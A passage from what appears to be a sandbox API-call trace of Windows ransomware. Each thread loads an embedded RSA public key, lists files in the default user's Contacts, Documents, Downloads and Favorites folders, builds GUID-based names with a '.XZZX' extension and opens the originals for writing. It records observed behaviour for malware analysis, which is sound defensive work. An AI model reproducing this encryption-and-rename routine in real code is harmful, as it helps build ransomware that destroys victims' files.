MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.846] lstrcpyW (in: lpString1=0x2baf460, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0258.846] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0258.846] SetErrorMode (uMode=0x1) returned 0x1 [0258.846] lstrcpyW (in: lpString1=0x2baf860, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0258.846] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xba1ffc72, Data2=0x983c, Data3=0x4d27, Data4=([0]=0x9c, [1]=0xe5, [2]=0xf0, [3]=0x2b, [4]=0xc7, [5]=0xad, [6]=0xc4, [7]=0x2b))) returned 0x0 [0258.846] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0258.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0258.847] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\9D62DAB82DE13D24BA1FFC72309C216C.XZZX") returned 67 [0258.847] StrStrW (lpFirst="Administrator.contact", lpSrch="XZZX") returned 0x0 [0258.847] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact", dwFileAttributes=0x20) returned 0 [0258.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1068 os_tid = 0x13c0 [0258.997] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.997] lstrcpyW (in: lpString1=0x2baf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0258.997] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0258.997] SetErrorMode (uMode=0x1) returned 0x1 [0258.997] lstrcpyW (in: lpString1=0x2baf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0258.997] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xf76f0fb8, Data2=0x2605, Data3=0x4e0d, Data4=([0]=0xb8, [1]=0x72, [2]=0x84, [3]=0xbc, [4]=0x18, [5]=0x80, [6]=0x35, [7]=0x70))) returned 0x0 [0258.997] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0258.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0258.998] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\51809E980B977441F76F0FB80E525889.XZZX") returned 67 [0258.998] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0258.998] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini", dwFileAttributes=0x20) returned 0 [0258.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1069 os_tid = 0x13c4 [0259.158] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.158] lstrcpyW (in: lpString1=0x2baf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.158] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\") returned="\\\\?\\C:\\Users\\Default\\Documents\\" [0259.158] SetErrorMode (uMode=0x1) returned 0x1 [0259.158] lstrcpyW (in: lpString1=0x2baf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.158] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xf918178a, Data2=0xec5c, Data3=0x4828, Data4=([0]=0xb1, [1]=0xe2, [2]=0xce, [3]=0x52, [4]=0x34, [5]=0x65, [6]=0x44, [7]=0x5f))) returned 0x0 [0259.158] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0259.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0259.158] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\BA5BAD98429ECE60F918178A4559B2A8.XZZX") returned 68 [0259.158] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0259.158] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini", dwFileAttributes=0x20) returned 0 [0259.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1070 os_tid = 0x13c8 [0259.318] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.318] lstrcpyW (in: lpString1=0x2baf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.318] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned="\\\\?\\C:\\Users\\Default\\Downloads\\" [0259.318] SetErrorMode (uMode=0x1) returned 0x1 [0259.318] lstrcpyW (in: lpString1=0x2baf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.318] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x932df093, Data2=0x9024, Data3=0x41ce, Data4=([0]=0xbe, [1]=0x2, [2]=0xb8, [3]=0x70, [4]=0xf4, [5]=0x72, [6]=0xde, [7]=0xcd))) returned 0x0 [0259.318] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0259.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0259.318] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\89C884AC250D20F8932DF09327C80540.XZZX") returned 68 [0259.318] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0259.318] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini", dwFileAttributes=0x20) returned 0 [0259.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1071 os_tid = 0x13cc [0259.467] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.467] lstrcpyW (in: lpString1=0x2baf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.467] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\" [0259.467] SetErrorMode (uMode=0x1) returned 0x1 [0259.467] lstrcpyW (in: lpString1=0x2baf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.467] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xab8f4cf4, Data2=0x8eb8, Data3=0x42d3, Data4=([0]=0x9d, [1]=0x2d, [2]=0xc0, [3]=0xdc, [4]=0x8c, [5]=0x25, [6]=0x47, [7]=0xd4))) returned 0x0 [0259.467] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0259.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0259.467] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\CBAEA760254111A8AB8F4CF427FBF5F0.XZZX") returned 68 [0259.467] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0259.467] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini", dwFileAttributes=0x20) returned 0 [0259.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1072 os_tid = 0x13d4 [0259.623] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.623] lstrcpyW (in: lpString1=0x2baf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.623] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0259.623] SetErrorMode (uMode=0x1) returned 0x1 [0259.623] lstrcpyW (in: lpString1=0x2baf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.623] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x5681c023, Data2=0x6a63, Data3=0x4a3d, Data4=([0]=0x88, [1]=0xaf, [2]=0x3b, [3]=0x88, [4]=0xfd, [5]=0x94, [6]=0x7a, [7]=0xb2))) returned 0x0 [0259.623] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0259.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0259.623] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\2DBBCB891ED9F7975681C0232194DBDF.XZZX") returned 74 [0259.623] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0259.623] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x20) returned 0 [0259.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1073 os_tid = 0x13d8 [0259.777] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.777] lstrcpyW (in: lpString1=0x2baf460, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0259.777] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0259.777] SetErrorMode (uMode=0x1) returned 0x1 [0259.777] lstrcpyW (in: lpString1=0x2baf860, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0259.777] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9076456a, Data2=0xb425, Data3=0x44d3, Data4=([0]=0x96, [1]=0xaa, [2]=0x3e, [3]=0x11, [4]=0x20, [5]=0x39, [6]=0x62, [7]=0x57))) returned 0x0 [0259.778] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0259.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0259.778] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\09E69052306E4E7F9076456A332932C7.XZZX") returned 74 [0259.778] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="XZZX") returned 0x0 [0259.778] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x20) returned 0 [0259.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1074 os_tid = 0x13dc [0259.935] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.935] lstrcpyW (in: lpString1=0x2baf460, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0259.935] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0259.935] SetErrorMode (uMode=0x1) returned 0x1 [0259.935] lstrcpyW (in: lpString1=0x2baf860, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0259.935] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xea6c8a1, Data2=0x7c0c, Data3=0x4cf3, Data4=([0]=0x9c, [1]=0x34, [2]=0x9f, [3]=0x7e, [4]=0x3c, [5]=0xa0, [6]=0x63, [7]=0x94))) returned 0x0 [0259.935] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0259.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0259.936] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\78FF638C25494F640EA6C8A1280433AC.XZZX") returned 87 [0259.936] StrStrW (lpFirst="IE Add-on site.url", lpSrch="XZZX") returned 0x0 [0259.936] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x20) returned 0 [0259.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 1075 os_tid = 0x13e0 [0260.089] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 